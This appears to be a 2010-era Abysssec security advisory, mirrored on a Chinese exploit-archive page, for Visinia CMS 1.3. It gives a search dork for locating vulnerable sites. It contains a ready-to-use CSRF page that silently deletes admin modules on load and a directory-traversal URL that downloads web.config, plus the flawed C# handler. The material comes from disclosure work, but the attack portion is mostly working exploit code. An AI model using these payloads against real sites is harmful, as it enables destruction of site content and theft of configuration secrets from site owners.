扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ <Day 3 (0day) | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ ''' Abysssec Inc Public Advisory Title:Visinia Multiple Vulnerabilities Affected Version :Visinia 1.3 Discovery:www.abysssec.com Vendor :http://www.visinia.com/ Download Links :http://visinia.codeplex.com/releases Dork :"Powered by visinia" Admin Page :http://Example.com/Login.aspx Description : =========================================================================================== This version of Visinia have Multiple Valnerabilities : 1- CSRF for Remove Modules 2- LFI for download web.config or any file CSRF for Remove Modules: =========================================================================================== With this vulnerability you can navigate the admin to visit malicioussite (when he is already logged in) to remove a Module with a POST request to server. In this path the Module will be removed: http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159 for removing other modules you need to just change ModuleId. The Source of HTML Page (Maliciousscript) is here: ---------------------------------------------------------------------------------------- <html> <head> <title >Wellcome to My Site!</title> Hello! ... ... ... This page remove Modules in Visinia CMS. <script> function RemoveModule() { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) {} var http = false; if (window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http = new ActiveXObject("Microsoft.XMLHTTP"); } url = "http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159"; http.onreadystatechange = done; http.open('POST', url, true); http.send(null); } function done() { if (http.readyState == 4 && http.status == 200) { } } </script> </head> <body onload ="RemoveModule();"> </body> </html> ---------------------------------------------------------------------------------------- File Disclosure Vulnerability: =========================================================================================== using this path you can download web.config file from server. http://Example.com/image.axd?picture=viNews/../../web.config The downloaded file is image.axd, while after downloading you find that the content of image.axd is web.config. Vulnerable Code is in this DLL: visinia.SmartEngine.dll and this Method : ProcessRequest(HttpContext context) -------------------------------------------------------------------- public void ProcessRequest(HttpContext context) { if (!string.IsNullOrEmpty(context.Request.QueryString["picture"])) { string fileName = context.Request.QueryString["picture"]; // Give the file from URL string folder = WebRoots.GetResourcesRoot(); try { FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName); int index = fileName.LastIndexOf(".") + 1; string extension = fileName.Substring(index).ToLower(); if (string.Compare(extension, "jpg") == 0) { context.Response.ContentType = "image/jpeg"; } else { context.Response.ContentType = "image/" + extension; } context.Response.TransmitFile(fi.FullName);// Put the file in 'Response' for downloading without any check } catch { } } } =========================================================================================== feel free to contact me : shahin [at] abysssec.com |
体验盒子
